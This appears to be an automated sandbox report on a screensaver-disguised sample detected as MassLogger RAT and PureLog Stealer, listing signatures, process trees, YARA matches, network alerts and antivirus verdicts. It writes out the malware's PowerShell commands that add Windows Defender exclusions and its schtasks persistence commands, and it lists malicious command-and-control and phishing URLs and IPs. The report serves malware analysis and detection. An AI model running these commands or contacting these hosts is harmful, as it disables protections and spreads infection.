Windows Analysis Report
PO#_1100015533.scr

Overview

General Information

Sample name: PO#_1100015533.scr
Analysis ID: 1591772
MD5: ac9d898648d7b851bbccb6f6028d45c6
SHA1: 82379e0b59f9a08c7196897a09be3ae859ec498a
SHA256: 6f9d6ab9fccd1087337ed8328407e5918bd3e2cddef4e4c4b56b067e956ac0d2

Detection

MassLogger RAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates files inside the volume driver (system volume information)
Drops executable to a common third party application directory
Drops large PE files
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for Windows Mail specific files
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Connects to many different domains
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates or modifies windows services
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • PO#_1100015533.scr (PID: 3260 cmdline: "C:\Users\user\Desktop\PO#_1100015533.scr" /S MD5: AC9D898648D7B851BBCCB6F6028D45C6)
    • powershell.exe (PID: 3356 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • powershell.exe (PID: 3452 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • schtasks.exe (PID: 3488 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
    • PO#_1100015533.scr (PID: 3632 cmdline: "C:\Users\user\Desktop\PO#_1100015533.scr" MD5: AC9D898648D7B851BBCCB6F6028D45C6)
      • Trading_AIBot.exe (PID: 3752 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
        • powershell.exe (PID: 3996 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • schtasks.exe (PID: 4020 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • apihost.exe (PID: 3628 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 46981F20592CA1EB36C2C21E396551EC)
      • Microsofts.exe (PID: 3800 cmdline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe" MD5: F6B8018A27BCDBAA35778849B586D31B)
  • taskeng.exe (PID: 3656 cmdline: taskeng.exe {B8732EC0-088E-49BD-8386-4378D1DF7E0C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • hVVSnrrP.exe (PID: 3720 cmdline: C:\Users\user\AppData\Roaming\hVVSnrrP.exe MD5: AC9D898648D7B851BBCCB6F6028D45C6)
      • powershell.exe (PID: 3036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 3156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 1884 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmp2972.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • hVVSnrrP.exe (PID: 772 cmdline: "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: AC9D898648D7B851BBCCB6F6028D45C6)
      • hVVSnrrP.exe (PID: 3364 cmdline: "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: AC9D898648D7B851BBCCB6F6028D45C6)
      • hVVSnrrP.exe (PID: 2556 cmdline: "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: AC9D898648D7B851BBCCB6F6028D45C6)
      • hVVSnrrP.exe (PID: 1924 cmdline: "C:\Users\user\AppData\Roaming\hVVSnrrP.exe" MD5: AC9D898648D7B851BBCCB6F6028D45C6)
  • armsvc.exe (PID: 3728 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 096F8412E89BED51F0B5E63CFDD50EDA)
  • alg.exe (PID: 3884 cmdline: C:\Windows\System32\alg.exe MD5: 194D43897AB889D24B26961F99059037)
  • aspnet_state.exe (PID: 2032 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe MD5: E77E152A4018445F2DBB4277C818FAEC)
  • ehrecvr.exe (PID: 3300 cmdline: C:\Windows\ehome\ehRecvr.exe MD5: 045A70B9D4D84B036CE87DE912F44EAD)
  • ehsched.exe (PID: 3588 cmdline: C:\Windows\ehome\ehsched.exe MD5: 0D46082BE032D7DA3EE657EA6CE0C32D)
  • FXSSVC.exe (PID: 3560 cmdline: C:\Windows\system32\fxssvc.exe MD5: 5F010917F62C2D56F7B242050E3524D7)
  • ieetwcollector.exe (PID: 3356 cmdline: C:\Windows\system32\IEEtwCollector.exe /V MD5: BF5F5556930D8CEF7BBAC46115910CF1)
  • maintenanceservice.exe (PID: 2164 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 5834C05D84CD41A0A0D4619A6C0CB933)
  • msdtc.exe (PID: 1488 cmdline: C:\Windows\System32\msdtc.exe MD5: 48149FCDFB3E1B695AD17C25A00F9901)
  • msiexec.exe (PID: 4060 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 0B127B7A1AB570F72488585B52FA0F77)
  • perfhost.exe (PID: 2476 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 11D691ADAD67DBAC861DB2471CE9028B)
  • Locator.exe (PID: 3336 cmdline: C:\Windows\system32\locator.exe MD5: 860030B06B83DAD907D4E0801AB228F9)
  • snmptrap.exe (PID: 3292 cmdline: C:\Windows\System32\snmptrap.exe MD5: BD9A4418F0BB9873B642B4914A4BCFC8)
  • vds.exe (PID: 3548 cmdline: C:\Windows\System32\vds.exe MD5: 39BE2351CC35C279474F5941C10A602A)
  • wbengine.exe (PID: 2860 cmdline: "C:\Windows\system32\wbengine.exe" MD5: FCD24DD63126C9B5BC420BF92FA39456)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\Microsofts.exe | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
C:\Users\user\AppData\Local\Temp\Microsofts.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\Microsofts.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
C:\Users\user\AppData\Local\Temp\Microsofts.exe | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown |
  • 0x101cd:$a1: get_encryptedPassword
  • 0x10509:$a2: get_encryptedUsername
  • 0xff5a:$a3: get_timePasswordChanged
  • 0x1007b:$a4: get_passwordField
  • 0x101e3:$a5: set_encryptedPassword
  • 0x11bb3:$a7: get_logins
  • 0x11864:$a8: GetOutlookPasswords
  • 0x11642:$a9: StartKeylogger
  • 0x11b03:$a10: KeyLoggerEventArgs
  • 0x1169f:$a11: KeyLoggerEventArgsEventHandler
C:\Users\user\AppData\Local\Temp\Microsofts.exe | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth |

Source | Rule | Description | Author | Strings
00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000008.00000002.380427536.0000000000400000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000008.00000002.393694590.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security |
00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#_1100015533.scr" /S, ParentImage: C:\Users\user\Desktop\PO#_1100015533.scr, ParentProcessId: 3260, ParentProcessName: PO#_1100015533.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", ProcessId: 3356, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#_1100015533.scr" /S, ParentImage: C:\Users\user\Desktop\PO#_1100015533.scr, ParentProcessId: 3260, ParentProcessName: PO#_1100015533.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", ProcessId: 3356, ProcessName: powershell.exe
Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 3752, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 3752, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f, ProcessId: 4020, ProcessName: schtasks.exe
Source: DNS query | Author: Brandon George (blog post), Thomas Patzke | Data: Image: C:\Users\user\AppData\Local\Temp\Microsofts.exe, QueryName: checkip.dyndns.org
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#_1100015533.scr" /S, ParentImage: C:\Users\user\Desktop\PO#_1100015533.scr, ParentProcessId: 3260, ParentProcessName: PO#_1100015533.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp", ProcessId: 3488, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#_1100015533.scr" /S, ParentImage: C:\Users\user\Desktop\PO#_1100015533.scr, ParentProcessId: 3260, ParentProcessName: PO#_1100015533.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr", ProcessId: 3356, ProcessName: powershell.exe
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3356, TargetFilename: C:\Users\user\AppData\Local\Temp\mmq5rtk3.bzo.ps1

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO#_1100015533.scr" /S, ParentImage: C:\Users\user\Desktop\PO#_1100015533.scr, ParentProcessId: 3260, ParentProcessName: PO#_1100015533.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp", ProcessId: 3488, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-15T12:57:15.987935+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.22 | 56475 | 8.8.8.8 | 53 | UDP
2025-01-15T12:57:50.144218+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.22 | 50568 | 8.8.8.8 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-15T12:57:12.878703+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.22 | 52781 | 8.8.8.8 | 53 | UDP
2025-01-15T12:57:47.254510+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.22 | 60507 | 8.8.8.8 | 53 | UDP
2025-01-15T12:58:21.044344+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.22 | 59447 | 8.8.8.8 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-15T12:57:51.628338+0100 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.22 | 49182 | TCP
2025-01-15T12:58:20.480766+0100 | 2018141 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.22 | 49188 | TCP
2025-01-15T12:58:46.657220+0100 | 2018141 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.22 | 49195 | TCP
2025-01-15T12:58:48.207200+0100 | 2018141 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.22 | 49196 | TCP
2025-01-15T12:58:53.957588+0100 | 2018141 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.22 | 49204 | TCP
2025-01-15T12:58:54.504326+0100 | 2018141 | 1 | A Network Trojan was detected | 34.227.7.138 | 80 | 192.168.2.22 | 49206 | TCP
2025-01-15T12:58:57.376908+0100 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.22 | 49211 | TCP
2025-01-15T12:58:59.225917+0100 | 2018141 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.22 | 49213 | TCP
2025-01-15T12:58:59.720208+0100 | 2018141 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.22 | 49214 | TCP
2025-01-15T12:59:02.787886+0100 | 2018141 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.22 | 49217 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-15T12:57:51.628338+0100 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.22 | 49182 | TCP
2025-01-15T12:58:20.480766+0100 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.22 | 49188 | TCP
2025-01-15T12:58:46.657220+0100 | 2037771 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.22 | 49195 | TCP
2025-01-15T12:58:48.207200+0100 | 2037771 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.22 | 49196 | TCP
2025-01-15T12:58:53.957588+0100 | 2037771 | 1 | A Network Trojan was detected | 34.246.200.160 | 80 | 192.168.2.22 | 49204 | TCP
2025-01-15T12:58:54.504326+0100 | 2037771 | 1 | A Network Trojan was detected | 34.227.7.138 | 80 | 192.168.2.22 | 49206 | TCP
2025-01-15T12:58:57.376908+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.22 | 49211 | TCP
2025-01-15T12:58:59.225917+0100 | 2037771 | 1 | A Network Trojan was detected | 35.164.78.200 | 80 | 192.168.2.22 | 49213 | TCP
2025-01-15T12:58:59.720208+0100 | 2037771 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.22 | 49214 | TCP
2025-01-15T12:59:02.787886+0100 | 2037771 | 1 | A Network Trojan was detected | 18.246.231.120 | 80 | 192.168.2.22 | 49217 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-15T12:57:44.372540+0100 | 2034983 | 1 | A Network Trojan was detected | 192.168.2.22 | 49175 | 54.244.188.177 | 80 | TCP
2025-01-15T12:58:13.044911+0100 | 2034983 | 1 | A Network Trojan was detected | 192.168.2.22 | 49183 | 82.112.184.197 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-15T12:57:11.148650+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49166 | 193.122.130.0 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-15T12:58:55.969486+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49194 | 82.112.184.197 | 80 | TCP


AV Detection

Source: PO#_1100015533.scr | Avira: detected
Source: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640 | Avira URL Cloud: Label: malware
Source: http://54.244.188.177/rmrhacpx | Avira URL Cloud: Label: malware
Source: http://ww7.przvgke.biz/ | Avira URL Cloud: Label: malware
Source: http://ww7.przvgke.biz/bhikwfegywkkepu?usid=20&utid=14164930459 | Avira URL Cloud: Label: malware
Source: http://ww12.fwiwk.biz/qdy?usid=20&utid=14164936400 | Avira URL Cloud: Label: phishing
Source: http://54.244.188.177/crsFLLcp | Avira URL Cloud: Label: malware
Source: http://54.244.188.177/rmrhacpxL | Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640Cb | Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/ayokafkcxduc?usid=20&utid=14164930640LocationETagAuthentication-InfoAgeAccep | Avira URL Cloud: Label: malware
Source: http://ww12.fwiwk.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjl8fHx8fHw2Nzg3YTJmYjY5OW | Avira URL Cloud: Label: phishing
Source: http://54.244.188.177/crs | Avira URL Cloud: Label: malware
Source: http://ww7.fwiwk.biz/lderrm?usid=20&utid=14164936613 | Avira URL Cloud: Label: phishing
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Avira: detection malicious, Label: HEUR/AGEN.1311126
Source: C:\Windows\System32\SearchIndexer.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Windows\System32\VSSVC.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\FXSSVC.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files\Windows Media Player\wmpnetwk.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\Locator.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\SysWOW64\perfhost.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | ReversingLabs: Detection: 21%
Source: PO#_1100015533.scr | Virustotal: Detection: 31%
Source: PO#_1100015533.scr | ReversingLabs: Detection: 21%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\SearchIndexer.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\VSSVC.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe | Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\FXSSVC.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
Source: C:\Program Files\Windows Media Player\wmpnetwk.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\Locator.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\perfhost.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe | Joe Sandbox ML: detected
